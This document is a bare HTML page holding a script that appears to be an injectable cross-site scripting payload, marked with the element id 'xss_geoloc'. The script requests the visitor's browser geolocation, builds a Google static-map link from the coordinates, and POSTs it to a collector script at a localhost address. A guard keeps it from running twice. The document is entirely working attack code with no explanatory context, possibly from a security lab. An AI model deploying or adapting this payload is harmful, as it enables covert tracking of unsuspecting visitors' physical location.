<html>
<head></head>
<body>
<script>
if (document.getElementById('xss_geoloc') == null){ 
function sendXHR(data)
{
        var xmlhttp= new XMLHttpRequest();
		xmlhttp.open("POST","http://127.0.0.1/secu/geoloc/geoloc.php",true);
        xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        xmlhttp.send("geo="+data);
}
function showPosition(position) {

var map ='http://maps.googleapis.com/maps/api/staticmap?center='+ position.coords.latitude+','+position.coords.longitude+'&zoom=14&size=600x400&sensor=false';
sendXHR(encodeURIComponent(map));
   
}
if (navigator.geolocation) 
	{
        navigator.geolocation.getCurrentPosition(showPosition);
    } else 
	{ 
        sendXHR("Geolocation is not supported by this browser.");
    }



script = document.createElement('script');script.id = 'xss_geoloc'; document.body.appendChild(script); }
</script>
